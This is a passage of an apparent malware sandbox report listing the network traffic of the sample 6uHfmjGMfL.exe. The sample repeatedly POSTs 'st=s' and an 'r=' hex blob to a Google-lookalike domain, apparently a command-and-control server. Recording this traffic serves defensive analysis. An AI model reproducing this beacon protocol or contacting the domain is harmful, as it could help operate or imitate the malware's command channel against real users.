              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.549792104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:27.247229099 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:27.885174990 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:27 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzGmBLudw26ubDfc7Pcyj88f96N%2BcUXmo2bNkMArHqFT9W5LjRnyYe0Q1MGobO2jvh5k00RapfprQwUnGbXnaMsBseuLV0zIQ%2BaeJ2ICwoeBdIRYOvAT%2BsMcp20wAg3nNyL1ULAVgdiL6yVQ%2FhzbwHLa%2BXi%2BVA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8ffcdad97d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1972&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.549807104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:29.402479887 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:29.978251934 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:29 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DdmFWg4p3oTY0fE7RhW4f0erdp0AxxtxWRqbT8n8EJUwTb8gngw98thghvfoQs2UeTyPTaan8iZJLL3dBOa9QyEjUvW1JQvrYF7IMD1dXDX40wv2yTE1nNBuyDb1U6uJuAClWQ0Q1sImukCESF5881kDAkxQoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea900a6eb4c443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.549823104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:31.605812073 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:32.261640072 CET813INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:32 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lze0guj4PNNJ9uz3WZXxit8b6MY%2F046YlbC3f2c52i%2BTIvFJ0SFZtDNsqk872ceQ8dYLpW4sXUT8ZvImNtFy9RUvMzGI26zWS8OMC1nryGZEA2l9H4kNMnEbZ7ti7xCPmNrNDAaQVZBcUBGsMyrPcvZSZGOgdw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90182e6a7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.549839104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:33.777914047 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:34.421993017 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:34 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGv9kLGGiebTym32eIrtcZOxtM%2Fc0B5bjgtSQNl8uOcyB9VrLEpfh%2Bf8r1oc%2FNUXRokg%2BmLuzbOHsJiIraYOmOqa9e1%2BOXe9dCYntlEAF2eDsni1l9NjSl87OjAFScUEoYbrSbqzomBdgKsVQHAMAtlywu6gjw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9025aa5d42d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.549855104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:36.061043024 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:36.707886934 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:36 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxGn168AKb%2FWVrB1W5qEi74Cco2pRLSSmGaUJK5M0N2aF%2BjjT5j2x8Oi5eHvip4WXiulyRHU9Q7N%2BRwRjbPMajH4BNgt0blUeQOB8%2F68kyxJddyghOQVzADnrVqujdMi4Aaz286kX9ZijHHubSu5IZv9BzCrQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9033fa0b8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1932&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.549871104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:38.214849949 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:38.879929066 CET830INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:38 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dt7A8oWyqx6BtAXp45hlkw9BEYF9LfRnX9fyy0YT%2BboHJ6e%2BZICoqe%2FTqKCGLdMGJFqM1VAJ0EDZexTlfkGdFCATtTxQ%2BLsfBuTlZxD%2BhX6q860%2BEUGUpDGOan20J4nCLxRsPSBEmLtRAnCNyC2tk24Yd0%2B72g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90417ca48c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2312&min_rtt=2312&rtt_var=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.549886104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:40.511753082 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:41.142518044 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:41 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky1ANEeNbyYQp2jv1Dc9xzbOLP2ha28ZbdmxYL8L%2F9vhRE0aLJl5JWHpElxvBBtHvcOlKJThnJwOWqcubVqs55dzEG3FUqkRP3I8xpNEs%2FLoXwY81zjg3lVlwAUdaqGPZcPWd7XqlaZhMPmo%2FfTbVrGuK%2BjD3g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea904fbd508c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1958&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.549896104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:42.871694088 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:43.501418114 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:43 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8hMZ0vUDqyxHdsLgtVKa2Owwno562%2BpYbQefFd%2BdP15ScpLtOkQQzkNHPBh%2FuK4RVuqFklZw5r08e5rdJvMCr2QQBHamr7OTBeDh6ObVoQc%2F7FwwHYylACwlXLLkrzavGPWQQfIsumpcw2fGLUD6V4C6RYp1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea905e6c620f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=1435&rtt_var=717&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.549914104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:45.138725042 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:45.766542912 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:45 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjPNanYsvRIIF9qNTtJf0uJPw48r5s%2F9pPB%2BADZZTEchJr9fkI6Dyoh5BReECTRAd9jG9rCW%2BsXxycDwJeJyA9EU%2BjFSZe9UrJWDY75z%2FEZox%2FNWRTAJDO0iPV46SCFZdeRxRl4853NfYwg5PZiWwJcKV6TqHg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea906c9f5f7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1920&rtt_var=960&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.549926104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:47.484566927 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:48.129406929 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:48 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vUTwa5zyEh3Ek%2FuNlX25TgSGqz1LQGGm82akWNyAyyCzaUw640T4XYSE%2B%2FnLeLBgsiM0KbmHnibCcvDE0i4YqO4I3i9Ou9auIlKOechxN5JTaNOUJSNrKlmAcWW5AxVN8E%2BAQJ7dzhMnVHqqW%2FlY246zYK3Zfw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea907b5c817d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1987&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.549942104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:49.761737108 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:50.406974077 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:50 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CMrsClHIQD3M%2BimDasGY7pjpUe8dd5WvbINQ4Qih%2Fz5GSNMtkgD6RZ1WgNayymymkQnQ5Ubd7D2lZ8gtAmCAAmfCYzvFAePdhFs3DafJmnGPAcG0CH2V8h1c7lLZas%2FbCpAapwkdo83wSJXglIORsvvYV8M1jA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9089983bc443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1537&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.549959104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:51.924940109 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:52.579974890 CET819INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:52 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1PCATpZVcXapcs1mUgjDyhBaq6i2Z1b2TBlcQ8J2hRFmX4GctpRgnH1iQ8ff8FEc8evo%2BAeQ42rERpEjBKpO1UDVGAqbNfwGoLWp0LIeQdie462J%2FwHSeTDBmBVaKHdQbW668hvKDUYIzfbchm5L7p6H1DqWA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90972bca43ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1733&rtt_var=866&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.549975104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:54.219134092 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:54.864738941 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:54 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Df7XMAMizzkqZFiFVwRZ7nsodpuPilY2uKicIB4PkkfZvIGxq8Kl8wYOh1lP2aAo8LLJNwNyqXwvgdenJUlKLh3N3n8vE5ludp5yEpntGSqHT%2FQSLkFCdWnrG4s%2BL9xDBTpsrIENxqGEwSXtmF0I%2Fbv1G6fRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90a57cd343ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.549990104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:56.405364037 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:57.035424948 CET832INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:56 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyMu8OHRSw3j%2FShBdrcEhnuB%2FxfNp0bnMXdU6O3zQviMJStes2j84sbMbQ%2BoQTohQi%2BtctTtaX%2FT4AukW5f4qrHn96ZRMk88f4Hw%2BKT5iBjXAvCbS9wDnjqD7nIAzjiBrY%2FZY%2FxH5epKR8gNgVQiXqfkCNvMAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea90b30ba98c0f-EWR
